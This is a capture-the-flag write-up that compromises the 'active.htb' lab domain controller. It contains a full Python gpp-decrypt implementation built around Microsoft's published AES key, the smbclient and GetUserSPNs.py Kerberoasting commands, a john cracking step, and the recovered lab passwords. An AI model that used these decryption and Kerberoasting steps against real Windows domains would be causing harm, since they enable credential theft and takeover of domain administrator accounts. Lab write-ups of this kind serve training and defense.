Machine IP: 10.10.10.100

Nmap
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019–09–20 10:29:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/20%OT=88%CT=1%CU=38163%PV=Y%DS=2%DC=T%G=Y%TM=5D84AAE
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M5
OS:4DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)
Uptime guess: 0.020 days (since Fri Sep 20 15:35:10 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
There is no HTTP service to gather information from, so we start with host enumeration over SMB (port 139) using smbclient:
smbclient -L 10.10.10.100
The listing shows several shares. One of them allows anonymous login, so let's connect to it and look for information.
The share exposes the domain's Policies tree (the layout of SYSVOL), and in it we find a Group Policy Preferences file:
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\machine\Preferences\Groups\Groups.xml
This Groups.xml holds information that can get us in.
In Groups.xml the Properties element for user "SVC_TGS" carries a cpassword attribute. That is not a hash: it is the account password encrypted with AES-256 under a key Microsoft published, so gpp-decrypt recovers the plaintext directly and no cracking is involved.
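What gpp-decrypt actually does, as an added Python example that is not part of the original writeup: it parses a Groups.xml, restores the base64 padding GPP strips, and decrypts the cpassword with the AES-256 key from Microsoft's MS-GPPREF specification. AES is written out in pure Python so the example runs with the standard library alone; the Groups.xml snippet is constructed (the page does not reproduce the real file) and its cpassword is the sample value decrypted here.

```python
"""What gpp-decrypt does: recover a GPP cpassword from Groups.xml."""
import base64
import xml.etree.ElementTree as ET

# The 32-byte AES key Microsoft published in MS-GPPREF (section 2.2.1.1.4). Because it is
# public, anyone who can read SYSVOL can decrypt every cpassword GPP ever wrote.
GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

# --- minimal AES-256 decryption in pure Python, so nothing beyond the stdlib is needed ---
def _gmul(a, b):  # multiply in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1
    r = 0
    for _ in range(8):
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0x100:
            a ^= 0x11B
        b >>= 1
    return r & 0xFF

def _rotl8(x, n):
    return ((x << n) | (x >> (8 - n))) & 0xFF

# S-box = affine transform of the multiplicative inverse; derived here instead of typed in.
_INV = [0] + [next(b for b in range(1, 256) if _gmul(a, b) == 1) for a in range(1, 256)]
SBOX = [b ^ _rotl8(b, 1) ^ _rotl8(b, 2) ^ _rotl8(b, 3) ^ _rotl8(b, 4) ^ 0x63 for b in _INV]
INV_SBOX = [SBOX.index(i) for i in range(256)]

def expand_key(key):  # FIPS-197 key schedule for Nk=8: 60 words -> 15 round keys
    w = [list(key[i:i + 4]) for i in range(0, 32, 4)]
    rcon = 1
    for i in range(8, 60):
        t = list(w[i - 1])
        if i % 8 == 0:  # RotWord, SubWord, Rcon
            t = [SBOX[t[1]] ^ rcon, SBOX[t[2]], SBOX[t[3]], SBOX[t[0]]]
            rcon = _gmul(rcon, 2)
        elif i % 8 == 4:  # extra SubWord step that only AES-256 has
            t = [SBOX[x] for x in t]
        w.append([w[i - 8][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(15)]

def _inv_shift_sub(s):  # InvShiftRows then InvSubBytes; state is column-major, index r + 4c
    return [INV_SBOX[s[r + 4 * ((c - r) % 4)]] for c in range(4) for r in range(4)]

def _inv_mix_columns(s):
    return [_gmul(s[4 * c + r], 14) ^ _gmul(s[4 * c + (r + 1) % 4], 11)
            ^ _gmul(s[4 * c + (r + 2) % 4], 13) ^ _gmul(s[4 * c + (r + 3) % 4], 9)
            for c in range(4) for r in range(4)]

def aes256_decrypt_block(rk, block):  # FIPS-197 section 5.3 inverse cipher
    s = [b ^ k for b, k in zip(block, rk[14])]
    for rnd in range(13, 0, -1):
        s = _inv_mix_columns([b ^ k for b, k in zip(_inv_shift_sub(s), rk[rnd])])
    return bytes(b ^ k for b, k in zip(_inv_shift_sub(s), rk[0]))

def gpp_decrypt(cpassword):
    """GPP strips the base64 '=' padding; the ciphertext is AES-256-CBC with an all-zero IV,
    PKCS#7 padded, and the plaintext is the password as UTF-16LE."""
    data = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    rk, prev, plain = expand_key(GPP_KEY), bytes(16), b""
    for i in range(0, len(data), 16):
        block = data[i:i + 16]
        plain += bytes(x ^ y for x, y in zip(aes256_decrypt_block(rk, block), prev))
        prev = block
    return plain[:-plain[-1]].decode("utf-16-le")

# Constructed Groups.xml in the layout GPP writes under Preferences\Groups\; the page does
# not reproduce the real file. The cpassword is the sample value this example decrypts.
SAMPLE_GROUPS_XML = r"""<Groups>
  <User name="active.htb\SVC_TGS">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>"""

def find_gpp_credentials(xml_text):
    """Return (userName, plaintext password) for every Properties element with a cpassword."""
    root = ET.fromstring(xml_text)
    return [(p.get("userName"), gpp_decrypt(p.get("cpassword")))
            for p in root.iter("Properties") if p.get("cpassword")]

if __name__ == "__main__":
    for user, password in find_gpp_credentials(SAMPLE_GROUPS_XML):
        print(f"{user}: {password}")
```

The same parser works on the other GPP files that can carry a cpassword (Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml), since each stores it in a Properties element; the fix on the defender's side is to delete these entries, because patching the DC (MS14-025) only stops new ones being written.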

Here we got our password, so now let's use it to move into the Users share with smbclient as SVC_TGS:
smbclient \\\\10.10.10.100\\Users -U SVC_TGS
Enter the password we got from gpp-decrypt when prompted.

And here we got our user.txt.
Let's enumerate further to get to root. Nmap showed kpasswd5 (port 464) open; that is the Kerberos password-change service, not an encryption type, and together with port 88 it confirms the host is a domain controller. Since we now hold valid domain credentials we can Kerberoast: any domain user may request a service ticket (TGS) for every account that has an SPN, and that ticket is encrypted with the service account's password hash, so it can be cracked offline to recover the account's password. Impacket's GetUserSPNs.py does the request part; with -request it prints each ticket in a crackable format:
python /usr/share/doc/python-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.100 ACTIVE.HTB/SVC_TGS
Enter the password "GPPstillStandingStrong2k18" when prompted.

Here we got the Administrator hash: the Administrator account has an SPN registered, so its service ticket comes back in the output.
John's krb5tgs format handles these tickets; the etype number after $krb5tgs$ (23 for RC4-HMAC, where the key is the account's NT hash) tells it which cipher to run, so we crack it with john:
- First copy the hash into a text file (admin-hash)
- Run john against it: john admin-hash --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt
- It finds the password "Ticketmaster1968"
- Let's connect to the SMB Users share with the Administrator credentials

And here we have our Administrator user.
Found the root flag at
Administrator/Desktop/root.txt


…………………………………..COWABUNGA……………………………..….